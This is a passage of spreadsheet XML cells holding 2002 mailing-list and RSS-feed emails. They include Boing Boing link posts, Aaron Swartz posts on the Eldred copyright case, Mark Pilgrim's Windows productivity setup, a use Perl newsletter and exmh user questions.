    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nSweatyFrog is a toy-review magazine/store, focusing on collectible toys with \ngreat, MegoSteve[1]-style erudite toy-otaku commentary. Toy_Design_Guru, who \nsuggested the link, recommends their occassional email newsletter as a \nmust-read. Link[2] Discuss[3] (_Thanks, Toy_Design_Guru!_)\n\n[1] [URL]http://www.megosteve.com[/URL]\n[2] [URL]http://www.sweatyfrog.com[/URL]\n[3] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.megosteve.com http://www.sweatyfrog.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:30 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:30 -0000</t>
  </si>
  <si>
    <t>Physics auction nets half-mil for Einstein</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nLast Friday's Christie's auction of original physics manuscripts included \noriginal works by Einstein, Curie, Newton and other physics rock-stars. The \nEinstein (which included an early attempt to prove relativity) went to an \nanonymous bidder for $500,000. Link[1] Discuss[2]\n\n[1] [URL]http://www.sciam.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.sciam.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:30 -0000</t>
  </si>
  <si>
    <t>How the other half gives</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe new Neiman Marcus Christmas catalog is out (in October!), including \nyou-as-an-action-figure ($7,500), a bamboo hut ($15,000) and a leather frisbee \n($30). Link[1] Discuss[2]\n\n[1] [URL]http://www.neimanmarcus.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.neimanmarcus.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:29 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:29 -0000</t>
  </si>
  <si>
    <t>Steven Levy's wireless neighbors</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nAfter discovering an open wireless net available from his sofa, Steven \n"Hackers" Levy interviewed lawmen, academics and WiFi activists about the \nlegality and ethics of using open wireless access points. \n\n    I downloaded my mail and checked media news on the Web. When I confessed \n    this to FBI agent Bill Shore, he spared the handcuffs. "The FBI wouldn't \n    waste resources on that," he sniffed. Now I know that if it did, it would \n    be hard to argue that I broke a law. What's more, I certainly didn't feel \n    illegal. Becauseand this is the point of all that war-driving and \n    -chalking and node-stumblingwhen you get used to wireless, the experience \n    feels more and more like a God-given right. One day we may breathe \n    bandwidth like oxygenand arguing its illegality will be unthinkable.  \n\nLink[1] Discuss[2] (_Thanks, Steven[3]!_)\n\n[1] [URL]http://www.msnbc.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.echonyc.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.msnbc.com http://www.quicktopic.com http://www.echonyc.com</t>
  </si>
  <si>
    <t>My OS X Keynote</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nI spoke at the Mac OS X conference in Santa Clara last week. It was a really \nfun event, and it was great meeting a lot of people whom I previously knew only \nthrough email, like Rael Dornfest, Danny O'Brien, and Glenn Fleishman. Here's \nthe talk I gave. Link[1] Discuss[2]\n\n[1] [URL]http://boingboing.net[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://boingboing.net http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:28 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:28 -0000</t>
  </si>
  <si>
    <t>1987 copy of Nintendo zine going for $700 on eBay</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nA Nintendo newsletter from 1987 is going for ober $700 on eBay. Link[1] Discuss\n[2] _(Thanks, Billy Hayes!)_\n\n[1] [URL]http://cgi.ebay.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:28 -0000</t>
  </si>
  <si>
    <t>City Planning Funnies</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nAt the OS X conference, Cory told me about a book called "The Life and Death of \nthe Great American Cities," by Jane Jacobs. This Metropolis Magazine comic \nstrip, by Ben Katchor, seems to resonate with what Cory told me about the book \n-- that cities die because mixed used areas are changed into single use areas. \nLink[1] Discuss[2]\n\n[1] [URL]http://metropolismag.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://metropolismag.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>Welcome, Danny and Quinn!</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThis time around, we have _two, two, two_ Guestbloggers for the price of one. \nQuinn Norton and Danny O'Brien have agreed to fill the sidebar slot for a \nlittle while. Danny and Quinn and their rommie Gilbert are just about the most \nfun Bay Areans I've had the pleasure of hanging out with. Between the three of \nthem, they're capable of being entertaining on the subjects of Python, \ncopyright, pottery, usability (a conversation with Quinn about usability made \nit, almost verbatim, into my second novel "Eastern Standard Tribe"), \nload-balancing, free software, nerd culture, British cuisine, bodily ailments, \npregnancy... Well, you name it. I can't wait to see what they post! Discuss[1]\n\n[1] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:26 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:26 -0000</t>
  </si>
  <si>
    <t>Man kills self with home booby-traps</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nSteve sez: "It's tragic when life imitates Wile E. Coyote cartoons. Guy \nboobytraps his house to get his family if they try to break in, and seemingly \nis killed himself by his own traps." Link[1] Discuss[2] (_Thanks, Steve[3]!_)\n\n[1] [URL]http://story.news.yahoo.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.portigal.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://story.news.yahoo.com http://www.quicktopic.com http://www.portigal.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:26 -0000</t>
  </si>
  <si>
    <t>Reclaiming privacy with laser-pointers</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nHere's a how-to explaining how to blind a surveillance camera a laser-pointer. \nLink[1] Discuss[2] (_Thanks, Mike[3]!_)\n\n[1] [URL]http://www.naimark.net[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.objectif.org[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.naimark.net http://www.quicktopic.com http://www.objectif.org</t>
  </si>
  <si>
    <t>Curried radiation burns</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nCurcumin, the chemical that makes curry yellow, turns out to be a good compound \nfor treating radiation burns resulting from cancer therapy. Link[1] Discuss[2] \n(_Thanks, Cheryl!_)\n\n[1] [URL]http://www.alertnet.org[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.alertnet.org http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: oblomovka &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:10 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:10 -0000</t>
  </si>
  <si>
    <t>At last, I have an excuse</t>
  </si>
  <si>
    <t>URL: [URL]http://www.oblomovka.com[/URL]\nDate: 2002-10-07T22:45:00-0700\n\n... for not updating: I'm doing the guestblog at Boing Boing[1]. Now to find an \nexcuse for missing last week.\n\n[1] [URL]http://www.boingboing.net[/URL]</t>
  </si>
  <si>
    <t>http://www.oblomovka.com http://www.boingboing.net</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:08 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:08 -0000</t>
  </si>
  <si>
    <t>Eldred Press Watch</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-10-07T15:55:20-06:00\n\nEric Eldred _himself_ was just on Marketplace[1]. \n\nNYTimes: Debate to Intensify on Copyright Extension Law[2] (front page of the \nbusiness section, below the fold). " It will fall to Mr. Lessig, who is a \nformer clerk for Supreme Court Justice Antonin Scalia and who has become a kind \nof rock star for the digital liberties set, to convince the justices to accept \nthe unconventional analysis. If they do, the decision could be a turning point \nin redefining a balance between copyright consumers and producers  and the \ntechnology companies that are often in the middle." \n\nNewsweek: Glitterati vs. Geeks[3]. "Larry Lessig admits it: hes nervous. Who \nwouldnt be? [...] In its narrowest context, Eldred v. Ashcroft deals with the \nseemingly arcane issue of the length of copyrights for books, films and music. \nBut its actually a high-noon showdown between two great industries at odds in \nthe age of the Internet." 'Theres a sense of deja vu to this. Television was \nsupposed to be the death of movies. And in 1982, the film industrys \nsilver-tongued lobbyist Jack Valenti testified that the VCR is to the American \nfilm producer and the American public as the Boston strangler is to the woman \nhome alone. (Video sales are now the studios biggest moneymaker.) Naturally, \nHollywood regards the computer/Internet combo as scarier than Nightmare on Elm \nStreet.'\n\n\n\n[1] [URL]http://www.marketplace.org[/URL]\n[2] [URL]http://www.nytimes.com[/URL]\n[3] [URL]http://www.msnbc.com[/URL]</t>
  </si>
  <si>
    <t>http://www.aaronsw.com http://www.marketplace.org http://www.nytimes.com http://www.msnbc.com</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:08 -0000</t>
  </si>
  <si>
    <t>Iran Pushes UN Intervention Against US</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-10-07T21:35:22-06:00\n\nYahoo: The Case for Regime Change[1].\n\n\n\n    \n\n    Khatami asked the U.N. to set a deadline for Bush to step down in favor of \n    president-in-exile Al Gore the legitimate winner of the 2000 election, the \n    results of which were subverted through widespread voting irregularities \n    and intimidation.  \n\n    [... This will likely require] a prolonged bombing campaign targeting major \n    U.S. cities and military installations, followed by a ground invasion led \n    by European forces. "Civilian casualties would likely be substantial," said \n    a French military analyst. "But the American people must be liberated from \n    tyranny." \n\n    [...] "Even before Bush, the American political system was a shambles," \n    said Prof. Salvatore Deluna of the University of Madrid. "Their \n    single-party plutocracy will have to be reshaped into true \n    parliamentary-style democracy. Moreover, the economy will have to be \n    retooled from its current military dictatorship model--in which a third of \n    the federal budget goes to arms, and taxes are paid almost exclusively by \n    the working class--to one in which basic human needs such as education and \n    poverty are addressed. Their infrastructure is a mess; they don't even have \n    a national passenger train system. Fixing a failed state of this size will \n    require many years."\n\n    \n\n\n\nWelcome news. The only way to crush America's fundamentalist tendencies is by \nshowing them who's boss.\n\n\n\n[1] [URL]http://story.news.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.aaronsw.com http://story.news.yahoo.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: aaronsw &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:07 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:07 -0000</t>
  </si>
  <si>
    <t>Apple: Heinous DVD Pirates</t>
  </si>
  <si>
    <t>URL: [URL]http://www.aaronsw.com[/URL]\nDate: 2002-10-08T01:21:33-06:00\n\nDeCSS detractors have repeatedly claimed that DeCSS needs to be stopped because \nit makes perfect digital copies of DVDs possible. Recently, in private email, \nErnest Miller claimed that doing so would be a violation of the DMCA. In this \nin-depth special report, I show that using perfectly legal, (I assume) \nlicensed, off-the-shelf consumer software, copying DVDs is easy and in many \nways encouraged. \n\n*Tools:*\n1 PowerBook G4 with slot-loading DVD drive (any model should work)\n1 Monsters, Inc. Collector's Edition DVD (any DVD should work)\n1 copy of Mac OS X 10.2 "Jaguar" \n\n*Process:*\n1. Insert DVD into drive. Notice how Jaguar helpfully loads the DVD Player for \nyou.\n2. Open the DVD (it appears on the desktop) and drag the VIDEO_TS folder to \nyour hard drive. Ejct the DVD.\n3. In DVD Player, select "Open VIDEO_TS Folder..." from the File menu. Use the \ndialog that appears to select the VIDEO_TS folder on your hard drive. \n\nNow the DVD plays just like it would were the DVD in the drive. By extension, I \ncould also put the DVD up on my site for you to download and watch. I could \nshare it via a P2P network. And I haven't done anything to decrypt the DVD or \nviolate the DMCA: I've used only basic tools available to all normal computer \nusers on my (I assume) fully-licensed consumer laptop. \n\n*Disclaimer:* Seth Schoen, whose opinion I highly respect on these matters, \nfinds it unlikely that the DVD was CSS-encrypted if this was possible. I am not \nsure how to verify if the DVD is CSS-encrypted. If someone has a suggestion, \nplease let me know. However, if it is true, then it's very interesting that \nDisney has released such a major movie without encryption.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:04 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:04 -0000</t>
  </si>
  <si>
    <t>My Good Easy</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-07T17:59:05-05:00\n\n_Joe Gregorio_: My next pet project[1]. &amp;#8220;Trying to re-create the "Good \nEasy[2]" on a Windows machine.&amp;#8221; I have also made half-hearted attempts in \nthis direction, as I am forced to use Windows during the day. I say \nhalf-hearted because I'm still application-centric, and I don't go as far with \nkeyboard shortcuts as I could. But I don't use the desktop at all (never have, \non any system), and I don't use ctrl alt keyboard shortcuts because I \npersonally find them awkward (YMMV). If you must use Windows, the first step \ntowards a productive system is managing your Start menu. \n\nI use the main level of the Start menu with numbered shortcuts to my most \ncommon programs. "0 Control Panel[3]", "1 Mozilla[4]", "2 Emacs[5]", "3 DOS \nhome", "4 DOS work", "5 DOS incoming" (each of which gives me a command line, \nbut in different directories), "7 Python[6]", "9 IE". Also "# Explorer home", \n"$ Explorer work", "% Explorer incoming", which open Explorer windows in \nvarious useful directories (the same directories as the DOS shortcuts, only \nwith the shift key held down, and yes, I intentionally set it up so that $ went \nto my work folder). Less-used programs are taken out of their useless submenus \n(as installed) and moved directly into the Programs submenu and given unique \nfirst letters as needed. "Ad-aware[7]", "Excel[8]", "IM", "Netscape 4[9]", \n"Paint Shop Pro", "Query Tool (ODBC)[10]", "VMWare[11]", "Word[12]". All other \nsubmenus except Startup are removed from the Programs menu. (Yes, delete \n"Accessories". Do you honestly ever use it? If so, it's probably a sign of a \nlarger productivity problem.) Things which never need to be run manually (like \nWinZip and Quicktime) are removed from the Programs menu. Maintaining a clean \nPrograms menu is an ongoing struggle, but well worth it. \n\nOn most modern keyboards, there is a key next to your left alt key that opens \nthe start menu, which you can press with your left thumb without taking your \nfingers off the home keys. Otherwise ctrl esc always works. Menu 4 gives me a \nnew command prompt in my work directory. Menu P N runs Netscape 4 (for \ncompatibility testing in my day job, ugh). Mozilla and Emacs are almost always \nopen, but I quit lesser-used applications as soon as I'm done using them \n(mostly because my laptop doesn't have a lot of memory). \n\nI install Cygwin[13] so that the command line is actually useful. Cygwin is a \ncollection of Windows ports of all your favorite UNIX utilities, including mv, \ncp, scp, ssh, man, tar, less, grep, patch, ncftp, cvs, and many others. And \nbash, which I don't use because I dislike how it handles Windows pathnames. I \nalso set the properties of my command line shortcuts to set the window size to \n120 x 50 (almost full screen at 1024 x 768), and screen buffer size to 120 x \n3000. Set window position at 0 x 0, and don't let the system position the \nwindow. \n\nIn Mozilla, I set my home page to "about:blank", set Internet Search to search \nwith Google, use Tabbed Browsing, open tabs instead of windows in all possible \ncases, always show the tab bar, and load links in the background (essential for \nweblog surfing, you can ctrl click links to open them in new tabs in the \nbackground). Under Scripts &amp; Plugins, I do not allow scripts to open \nunrequested windows. I turn off the sidebar, turn on the Site Navigation Bar, \ndelete all pre-installed bookmarks, and create two bookmarks: one which takes \nme to my webmail, and another which takes me to my internal site search[14], \nfrom which I can find all other bookmarks I need. \n\nIn Internet Explorer, I set my home page to the page to edit my weblog, since \nthat's the only thing I do in Internet Explorer. alt tab back and forth between \nMozilla and IE is easier than ctrl pgup/pgdown between tabs within Mozilla, \nsince TEXTAREAs in Mozilla lose focus when you switch tabs, making copying and \npasting weblog entries virtually impossible. \n\nI use Emacs locally and vi remotely, because the default behavior of Emacs is \nso heinous as to render it unusable. (For instance, editing a CGI script named \nfoo.cgi on a web server with Emacs would generate a foo.cgi~ backup file, which \nis world-readable and is sent as plain text to any browser that asks. Try this \nsometime on your favorite web site.) Among other things, my .emacs file (which \nis actually called _emacs on Windows) instructs Emacs to store all backup files \nin a single directory (d:\backup); to treat all XML files as DocBook, all CGI \nscripts as Python, and all SQL scripts as PL/SQL; to use Cygwin's bash shell \nfor M-x-shell; to use a single maximized frame with no menubar, titled as the \nname of the current file; to show column numbers; to accept "y" and "n" for \nyes/no questions; not to blink; not to beep; and to close the current file when \nI press M-w. I use some weird registry hacks and a hacked notepad.exe to get \nall text files to open in Emacs. (I got this idea from Ultraedit[15].) My \n_emacs file is my second most backed-up possession. \n\nI don't use Windows' useless directory structure for user home directories. On \nmy D drive I have d:\home (contains directories for my books and other personal \nprojects, each under CVS control&amp;#8212;also set as my home directory using the \nHOME environment variable), d:\work (contains directories for each work \nproject, also under CVS), d:\incoming (set as default download directory for \nall programs that download things), and d:\backup (used by Emacs, and for \ntemporary storage, for instance for storing originals when checking out newly \ncreated CVS projects). I don't know or care what's where on my C drive. \n\nI have tried many, many address books, and still store all my contacts, email \naddresses, snail mail addresses, phone numbers, and other vital personal \ninformation in a text file called phone, stored in d:\home\phone. It is not in \nany particular format, other than being plain text and usually including blank \nlines between entries. I categorize people with simple keywords in parentheses \nafter their name, and use M-x-occur in Emacs to search by keyword. This file is \nmy single most backed-up possession. \n\nOther essential free Windows utilities I use (in no particular order): TweakUI\n[16], Cygwin[17], Guidescope[18], ZoneAlarm[19].\n\n\n\n[1]  [URL]http://bitworking.org[/URL]\n[2]  [URL]http://www.winterspeak.com[/URL]\n[3]  [URL]http://www.annoyances.org[/URL]\n[4]  [URL]http://www.mozilla.org[/URL]\n[5]  [URL]http://www.gnu.org[/URL]\n[6]  [URL]http://www.activestate.com[/URL]\n[7]  [URL]http://www.lavasoftusa.com[/URL]\n[8]  [URL]http://www.openoffice.org[/URL]\n[9]  [URL]http://sillydog.org[/URL]\n[10] [URL]http://gpoulose.home.att.net[/URL]\n[11] [URL]http://www.vmware.com[/URL]\n[12] [URL]http://www.openoffice.org[/URL]\n[13] [URL]http://www.cygwin.com[/URL]\n[14] [URL]http://diveintomark.org[/URL]\n[15] [URL]http://www.ultraedit.com[/URL]\n     Replacing Notepad with Ultraedit-32\n[16] [URL]http://www.microsoft.com[/URL]\n[17] [URL]http://www.cygwin.com[/URL]\n[18] [URL]http://www.guidescope.com[/URL]\n[19] [URL]http://download.com.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://bitworking.org http://www.winterspeak.com http://www.annoyances.org http://www.mozilla.org http://www.gnu.org http://www.activestate.com http://www.lavasoftusa.com http://www.openoffice.org http://sillydog.org http://gpoulose.home.att.net http://www.vmware.com http://www.openoffice.org http://www.cygwin.com http://diveintomark.org http://www.ultraedit.com http://www.microsoft.com http://www.cygwin.com http://www.guidescope.com http://download.com.com</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: diveintomark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:04 -0000</t>
  </si>
  <si>
    <t>Teach a man to fish</t>
  </si>
  <si>
    <t>URL: [URL]http://diveintomark.org[/URL]\nDate: 2002-10-08T00:22:08-05:00\n\n_Kevin Hemenway_: Finding More Channels[1]. &amp;#8220;In simple terms, there are \nthousands of web sites that are actively providing their news and headlines in \na format AmphetaDesk can understand [RSS]. And while AmphetaDesk knows about a \ngood number of these sites, it'd be impossible to hunt down each and every \nsingle possibility. So, this page is here to teach you how to fish.&amp;#8221;\n\n\n\n[1] [URL]http://www.disobey.com[/URL]</t>
  </si>
  <si>
    <t>http://diveintomark.org http://www.disobey.com</t>
  </si>
  <si>
    <t>To: zzzz-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 08 Oct 2002 02:00:35 +0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 02:00:35 +0000</t>
  </si>
  <si>
    <t>zzzz-use-perl@spamassassin.taint.org</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-10-08</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * This Week on perl5-porters (30 September / 6 October 2002)\n    * RATS\n\n+--------------------------------------------------------------------+\n| This Week on perl5-porters (30 September / 6 October 2002)         |\n|   posted by rafael on Monday October 07, @07:12 (summaries)        |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\nIt was a busy week indeed, with long threads, interesting bugs, clever\nfixes, miscellaneous optimizations, some new ideas, a few jokes,\nmysterious failures, and, finally, a security hole. Read on.\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\n\n+--------------------------------------------------------------------+\n| RATS                                                               |\n|   posted by KM on Monday October 07, @09:01 (news)                 |\n|   [URL]http://use.perl.org[/URL]               |\n+--------------------------------------------------------------------+\n\nOdud writes "RATS, the Rough Auditing Tool for Security, is a security\nauditing utility for C, C++, Python, Perl and PHP code. RATS scans source\ncode, finding potentially dangerous function calls. The goal of this\nproject is not to definitively find bugs. The current goal is to provide\na reasonable starting point for performing manual security audits.\nProduced by [0]Secure Software" Uses a database so you can alter what you\nwant it to look for. Not a replacement for using stricture or your head\nbut is a good place to start some security auditing on your Perl.\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://www.securesoftware.com[/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 http://use.perl.org http://use.perl.org http://www.securesoftware.com http://use.perl.org</t>
  </si>
  <si>
    <t>To: zzzz-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 08 Oct 2002 02:00:26 +0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 02:00:26 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-10-08</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nThis Week on perl5-porters (30 September / 6 October 2002)\n    posted by rafael on Monday October 07, @07:12 (summaries)\n    [URL]http://use.perl.org[/URL]\n\nRATS\n    posted by KM on Monday October 07, @09:01 (new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exmh-users@spamassassin.taint.org\nFrom: Dag Nygren &lt;dag@newtech.fi&gt;\nDate: Tue, 08 Oct 2002 00:27:22 +0300</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 00:27:22 +0300</t>
  </si>
  <si>
    <t>Ringing bell on other computer</t>
  </si>
  <si>
    <t>Hi,\n\nsucceeded in ringing a bell anytime I get a mail\nto my inbox (Not Mailing lists, spams etc.) by\nusing procmail to execute a "play clink.wav" on\nthe "right" mails.\nNow my demands are growing ;-)\nI use my laptop remotely very often and now I would\nlike the bell to sound on that when I am there.\nI triedto use the KDE remote sound server and it works in\nthe tests, but when procmail runs it it doesn't, presumably\nas it doesn't have the authorization to communicate with\nthe laptop, beeing another user?\n\nAny hints.\n\nBRGDS\n\n\n-- \nDag Nygren                               email: dag@newtech.fi\nOy Espoon NewTech Ab                     phone: +358 9 8024910\nTrsktorpet 3                              fax: +358 9 8024916\n02360 ESBO                              Mobile: +358 400 426312\nFINLAND\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: J C Lawrence &lt;claw@kanga.nu&gt;\nDate: Tue, 06 Aug 2002 22:53:26 -0700</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 22:53:26 -0700</t>
  </si>
  <si>
    <t>On Wed, 07 Aug 2002 01:38:55 -0400  Tom Lane  wrote: &gt; I useta use mh-e regularly, but I never figured out whether it could &gt; handle exmh's multidrop mechanism, which is something I've grown to &gt; rely on.  Does that work in recent mh-e versions?  I'd love to use &gt; mh-e when reading mail remotely, if it can handle my multiple-inbox- &gt; folders setup... I've no idea.  Have you tried asking on the MH-E lists? --  J C Lawrence                 ---------(*)                Satan, oscillate my metallic sonatas.  claw@kanga.nu               He lived as a devil, eh?		   [URL]http://www.kanga.nu[/URL]  Evil is a name of a foeman, as I live. _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Tue, 06 Aug 2002 20:40:06 +0700</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 20:40:06 +0700</t>
  </si>
  <si>
    <t>Re: inbox mail notification broken</t>
  </si>
  <si>
    <t>Date:        Tue, 06 Aug 2002 09:04:58 +0100     From:        Marc Baaden      Message-ID:     | Any hints ? Probably a private sequence has gotten set, the highlighting only works for public ones. If "scan unseen" works as you'd expect, but highlighting doesn't, that's the usual explanation. kre _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Brent Welch &lt;welch@panasas.com&gt;, exmh-workers@spamassassin.taint.org\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Tue, 06 Aug 2002 17:14:33 -0500</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 17:14:33 -0500</t>
  </si>
  <si>
    <t>Brent Welch &lt;welch@panasas.com&gt;, exmh-workers@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Re: scan bug: no update after Pick's "New FTOC"</t>
  </si>
  <si>
    <t>--==_Exmh_-1362576751P Content-Type: text/plain; charset=us-ascii &gt; From:  Chris Garrigues  &gt; Date:  Thu, 01 Aug 2002 13:09:56 -0500 &gt; &gt; &gt; From:  Chris Garrigues  &gt; &gt; Date:  Thu, 01 Aug 2002 10:01:04 -0500 &gt; &gt; &gt; &gt; &gt; If you run Pick, and then use the "New FTOC" button to show only &gt; &gt; &gt; those messages selected by pick, then the ftoc display was considered &gt; &gt; &gt; "invalid" in the old code.  This prevented the display from being cache &gt; d, &gt; &gt; &gt; and it meant that you could get back to the full folder display by &gt; &gt; &gt; clicking on the folder lablel.  That doesn't work anymore.  You have &gt; &gt; &gt; to resort to Rescan Folder.  In fact, when you change folders you &gt; &gt; &gt; continue to have the Pick results, not the new folder contents. &gt; &gt; &gt; If you go to a any folder and do Rescan, then it heals itself. &gt; &gt;  &gt; &gt; Well, that's obviously my fault.  Okay, will look when I get a chance. &gt;  &gt; My copy of the tree right now is full of organizational changes in  &gt; preparation for generalizing the unseen window for display of other  &gt; sequences, so I'll probably not check in a fix for this until I  &gt; stabilize that. I've checked in my organizational changes and I've checked in a fix for the  invalid sequence bug. My next task is to actually create a general sequences window now that the  data that it will display is available. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-1362576751P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9UEpJK9b4h5R0IUIRAly4AJ9JqYqattDLUZzch4PiTiuPPSa71wCfcmGj svaqQHz1vj1kC38IMUdkH7g= =8BBR -----END PGP SIGNATURE----- --==_Exmh_-1362576751P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Tue, 06 Aug 2002 15:55:48 +0100</t>
  </si>
  <si>
    <t>Tue, 06 Aug 2002 15:55:48 +0100</t>
  </si>
  <si>
    <t>Re: integrating a couple spamassassin actions into the More... menu</t>
  </si>
  <si>
